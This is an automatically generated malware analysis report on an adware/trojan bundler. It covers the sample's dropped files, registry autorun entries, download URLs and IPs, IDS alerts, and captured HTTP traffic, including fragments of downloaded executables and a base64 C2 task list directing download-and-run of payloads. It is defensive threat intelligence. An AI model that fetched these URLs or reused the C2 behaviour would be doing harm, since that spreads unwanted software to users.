Gen.Variant.Strictor.109765_cdeec13765

by malwarelabrobot on March 27th, 2018 in Malware Descriptions.

Gen:Variant.Strictor.109765 (BitDefender), SoftwareBundler:MSIL/Wizrem (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Adware.WizzMonetize.1 (DrWeb), Gen:Variant.Strictor.109765 (B) (Emsisoft), PUP-XDE-TD (McAfee), Trojan.Gen.2 (Symantec), Gen:Variant.Strictor.109765 (FSecure), Win32:Adware-gen [Adw] (AVG), Win32:Adware-gen [Adw] (Avast), TROJ_GEN.R039C0PKO17 (TrendMicro), Gen:Variant.Strictor.109765 (AdAware), Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, mzpefinder_pcap_file.YR, InstallerInnoSetup.YR (Lavasoft MAS)
Behaviour: Trojan, Installer, PUP, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: cdeec13765ba7237961b212c71dfbc1a
SHA1: fc5b39e5109dbbd01dcec4a3d0883a4107a9c0d6
SHA256: 2fc835c126a053bc93c9c3d362c481a949c0a2732575468baaddb47434b80089
SSDeep: 1536:gK5V2sf5EeMcKkVrOskCu2D6RW/obAMwdwQF:j5VqBcPrOsz6RWbdtF
Size: 54784 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: TweakBit
Created at: 2017-11-24 04:15:04
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

SecondL.exe:3236
wyrm4bnfuck.exe:2968
OneTwo.exe:840
up.exe:3864
%original file name%.exe:3676

The Trojan injects its code into the following process(es):

58NPSAZXW.exe:2692
%original file name%.exe:3032
wyrm4bnfuck.tmp:2520

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process SecondL.exe:3236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\20ehjizk4kl\wyrm4bnfuck.exe (68980 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3236.7073381 (0 bytes)

The process wyrm4bnfuck.exe:2968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MJFS9.tmp\wyrm4bnfuck.tmp (1569 bytes)

The process OneTwo.exe:840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\58NPSAZXWZ\58NPSAZXW.exe (69780 bytes)
%Program Files%\58NPSAZXWZ\uninstaller.exe (2590 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\58NPSAZXWZ\58NPSAZXW.exe.config (1 bytes)
%Program Files%\58NPSAZXWZ\uninstaller.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.840.7073522 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.840.7073522 (0 bytes)

The process 58NPSAZXW.exe:2692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\58NPSAZXWZ\cast.config (37 bytes)

The process up.exe:3864 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (836 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (836 bytes)

The process %original file name%.exe:3032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\OneTwo.exe (2452 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\up.exe (145806 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\SecondL.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\up.exe.config (1 bytes)

The process wyrm4bnfuck.tmp:2520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\itdownload.dll (1489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\idp.dll (1502 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\psvince.dll (88 bytes)

Registry activity

The process SecondL.exe:3236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process OneTwo.exe:840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 58NPSAZXW.exe:2692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HJ2O0Z2VCIVQCDU" = "%Program Files%\58NPSAZXWZ\58NPSAZXW.exe"

The process up.exe:3864 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"MaxFileSize" = "1048576"

The process %original file name%.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_A1904" = "C:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process wyrm4bnfuck.tmp:2520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"Owner" = "D8 09 00 00 3F 78 AB 94 99 C4 D3 01"

"SessionHash" = "EF 2C E8 60 18 16 4E 1D 6D E4 E8 E4 4D 42 A8 93"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"4147223" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\20ehjizk4kl\wyrm4bnfuck.exe /VERYSILENT"

Dropped PE files

MD5 File path
7a16fdd24964f3db7dd68cb0fe9525d9 c:\Program Files\58NPSAZXWZ\58NPSAZXW.exe
8a11cbe8e1f02820cbf3d8ea0a5ea681 c:\Program Files\58NPSAZXWZ\uninstaller.exe
ba41fa5513ec262337ec3f8592bb662c c:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\OneTwo.exe
e3d83c4e821a3a72170999df92160a6e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\SecondL.exe
0f7697b39f2a6cab1f08aea09e626791 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\up.exe
b37377d34c8262a90ff95a9a92b65ed8 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\idp.dll
d82a429efd885ca0f324dd92afb6b7b8 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\itdownload.dll
d726d1db6c265703dcd79b29adc63f86 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\psvince.dll
be1cfa8011b16d477c9833c860b0c1e2 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MJFS9.tmp\wyrm4bnfuck.tmp
9ff3888227c0edcfe7501a60f9964cef c:\Users\"%CurrentUserName%"\AppData\Roaming\20ehjizk4kl\wyrm4bnfuck.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: 08FI72
Product Name: 0
Product Version: 4.1.8.7
Legal Copyright: Copyright (c) 7996
Legal Trademarks:
Original Filename: Ksa88.exe
Internal Name: Ksa88.exe
File Version: 4.1.8.7
File Description: 0
Comments: 08FI72
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 47712 48128 4.29726 0e1f168cfc3fcf86108c6d6d494703d6
.rsrc 57344 5336 5632 3.48156 1b5d0557f92a5ac2254f458e9ca950cc
.reloc 65536 12 512 0.056519 46c66e5da65eb13236f31ca0c4cb15db

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.wizzmonetize.com/remotes_xml_sections.php 176.31.252.74
hxxp://asedownloadgate.com/from_backup/747474/AdsShow_installer.exe 94.23.252.37
hxxp://asedownloadgate.com/3/000000/wizzcaster_installer_v2.exe 94.23.252.37
hxxp://asedownloadgate.com/exe/updater.exe 94.23.252.37
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load 176.31.252.74
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok 176.31.252.74
hxxp://asedownloadgate.com/safe_download/582369/AdsShow.exe 94.23.252.37
hxxp://asedownloadgate.com/download/3/wizzcaster_v2.exe 94.23.252.37
hxxp://asedownloadgate.com/download/3/wizzcaster_uninstaller_v2.exe 94.23.252.37
hxxp://www.wizzmonetize.com/api/v5/config 176.31.252.74
hxxp://www.wizzmonetize.com/api/v5/link 176.31.252.74
agent.wizztrakys.com 188.165.209.131
ladomainadeserver.com 176.31.115.114


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:59 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
a2a00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
.../<.Z.........."...0..............4... ...@....@.. ..............
......................@..................................4..O....@....
...................`.......4..........................................
..... ............... ..H............text........ ....................
.. ..`.rsrc........@......................@..@.reloc.......`.......(..
............@..B.................4......H........!.............../..X.
...........................................0..o.......(....~....o....s
....o.............~....(....(......(....o....r...po.....(.....o....t".
.........%...o....&..&..*.........kk.......0..M........(.....s....%(..
...o....o ...%.o!...%.o"...%o#.......io$....o%...(.....o&...*Vr...p...
..r9..p.....*..('...*.~....-.ri..p.....((...o)...s*........~....*.~...
.*.......*.~....*..( ...*Vs....(,...t.........*.BSJB............v2.0.5
0727......l...t...#~...... ...#Strings............#US.........#GUID...
....P...#Blob...........W..........3........ ...................,.....
..............................................Y.................^.....
......<.................y.......................K..................
...........Y.....p.....0.......$...3.......J.....J...............s....
.R....._.......................?.....(...........j....................
...s.......................................z.P.=......... .m.=........
...m.e...............................Z...P ............. .........
<<< skipped >>>

GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1


Host: asedownloadgate.com


HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:30:00 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
6e00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..0<.Z.........."...0..Z..........fx... ........@.. ...............
.....................@..................................x..O.......(..
..........................w...........................................
.... ............... ..H............text...lX... ...Z.................
. ..`.rsrc...(............\..............@..@.reloc...............l...
...........@..B................Gx......H........!.............../...G.
..........................................0..o.......(....~....o....s.
...o.............~....(....(......(....o....r...po.....(.....o....t"..
........%...o....&..&..*.........kk.......0..M........(.....s....%(...
..o....o ...%.o!...%.o"...%o#.......io$....o%...(.....o&...*Vr...p....
.r9..p.....*..('...*.~....-.ri..p.....((...o)...s*........~....*.~....
*.......*.~....*..( ...*Vs....(,...t.........*.BSJB............v2.0.50
727......l...t...#~...... ...#Strings............#US.........#GUID....
...P...#Blob...........W..........3........ ...................,......
.............................................Y.................^......
.....<.................y.......................K...................
..........Y.....p.....0.......$...3.......J.....J...............s.....
R....._.......................?.....(...........j.....................
..s.......................................z.P.=......... .m.=.........
..m.e...............................Z...P ............. ..........
<<< skipped >>>


GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:59 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
d21e5..MZP.....................@......................................
.........!..L.!..This program must be run under Win32..$7.............
......................................................................
.....................................................PE..L....^B*.....
................N....................@..........................`.....
.......@......@..............................|.... ...<............
......................................................................
........................CODE................................ ..`DATA..
..P...........................@...BSS.................................
.....idata..|...........................@....tls......................
...............rdata..............................@..P.reloc..........
....................@..P.rsrc....<... ...>..................@..P
.............P......................@..P..............................
......................................................................
..............................................................string..
..............<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)
@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName.
..(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize
...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..Method
Name..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..F
reeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..
@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>


POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1

HTTP/1.1 200 OK


Date: Mon, 26 Mar 2018 00:29:48 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=89kkkv9bvapjoreosptm6a03i6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1608
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iOTAiPgoKPHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bm
xvYWQgbmFtZT0iU2Vjb25kTCIgdmFsdWU9Imh0dHA6Ly9hc2Vkb3dubG9hZGdhdGUuY29t
L2Zyb21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249Ii
IgIHNvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5h
bWU9IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW
9kIHR5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxODAzMjYiLz4NCg0KPC9wZXJm
b3JtPg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbm
UiIHZhbHVlPSI0NTE4MDMyNiIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4N
CjwvdGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd2
8iIHZhbHVlPSJodHRwOi8vYXNlZG93bmxvYWRnYXRlLmNvbS8zLzAwMDAwMC93aXp6Y2Fz
dGVyX2luc3RhbGxlcl92Mi5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5ldD0ieW
VzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9Ik9uZVR3byIgdmFsdWU9Im5v
dHdhaXQiIHBhcmFtcz0iNTdhNzY0ZDA0MmJmOCIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbW
U9IkhhaGEiIHZhbHVlPSIwMDAxODAzMjYiLz4NCg0KPC9wZXJmb3JtPg0KDQo8Y29uZGl0
aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iSGFoYSIgdmFsdWU9IjE4MDMyNi
IgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwvdGFzaz48dGFzaz4NCg0K
PHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJ1cCIgdmFsdWU9Imh0dHA6Ly9hc2Vkb3
dubG9hZGdhdGUuY29tL2V4ZS91cGRhdGVyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9
IiIgbmV0PSJ5ZXMiIC8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0idXAiIHZhbH
VlPSJ3YWl0IiBwYXJhbXM9IndlIi8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iRGF0ZSIg
dmFsdWU9ImZlOGYxODAzMjYiLz4NCg0KPC9wZXJmb3JtPg0KDQo8Y29uZGl0aW9ucz4NCg
0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iRGF0ZSIgdmFsdWU9IjE4MDMyNiIgbWF0
<<< skipped >>>


GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:56 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Content-Length: 7168
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Z
.........."...0.............N0... ...@....@.. ........................
............@................................../..O....@..............
.........`....................................................... ....
........... ..H............text...T.... ...................... ..`.rsr
c........@......................@..@.reloc.......`....................
..@..B................00......H........!..\...........................
.................................0............s.......(....(....r...pr
...po....(......(....&.(....r...pr...po....r...p(....(......r...p.o...
.........,..r...p...(....(....& ..r...p(....&.........*...............
..&.(......*...0..9........~.........,".r...p.....(....o....s.........
...~..... ..*....0...........~..... ..*".......*.0...........~..... ..
*".( ....*Vs....(!...t.........*..BSJB............v2.0.50727......l...
....#~..8.......#Strings............#US.........#GUID...,...0...#Blob.
..........W..........3........%...................!...................
............................#...........W.....@.......7.....7.....7...
w.7...C.7...\.7.....7.................7.....................I.....#...
..:.................S.".........k...............o.m...................
...._.....r...........B.......7.............................=.........
..O.=.........d.O.i...................2...P .............!............
.!......{.....X!............o!............x!.............!........
<<< skipped >>>

GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1


Host: asedownloadgate.com


HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:56 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
9400..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
../<.Z.........."...0.............~.... ........@.. ...............
.....................@................................. ...O.......(..
......................................................................
.... ............... ..H............text........ .....................
. ..`.rsrc...(...........................@..@.reloc...................
...........@..B................_.......H........!.............../...o.
..........................................0..o.......(....~....o....s.
...o.............~....(....(......(....o....r...po.....(.....o....t"..
........%...o....&..&..*.........kk.......0..M........(.....s....%(...
..o....o ...%.o!...%.o"...%o#.......io$....o%...(.....o&...*Vr...p....
.r9..p.....*..('...*.~....-.ri..p.....((...o)...s*........~....*.~....
*.......*.~....*..( ...*Vs....(,...t.........*.BSJB............v2.0.50
727......l...t...#~...... ...#Strings............#US.........#GUID....
...P...#Blob...........W..........3........ ...................,......
.............................................Y.................^......
.....<.................y.......................K...................
..........Y.....p.....0.......$...3.......J.....J...............s.....
R....._.......................?.....(...........j.....................
..s.......................................z.P.=......... .m.=.........
..m.e...............................Z...P ............. ..........
<<< skipped >>>

GET /exe/updater.exe HTTP/1.1


Host: asedownloadgate.com


HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:56 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
208200..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L...E<.Z.........."...0..n ........... .. .... ...@.. .............
........... ...........@.................................k. .O..... .(
..................... ....... ........................................
...... ............... ..H............text....m .. ...n ..............
... ..`.rsrc...(..... ......p .............@..@.reloc........ ....... 
.............@..B.................. .....H........!.............../..@
] ..........................................0..o.......(....~....o....
s....o.............~....(....(......(....o....r...po.....(.....o....t"
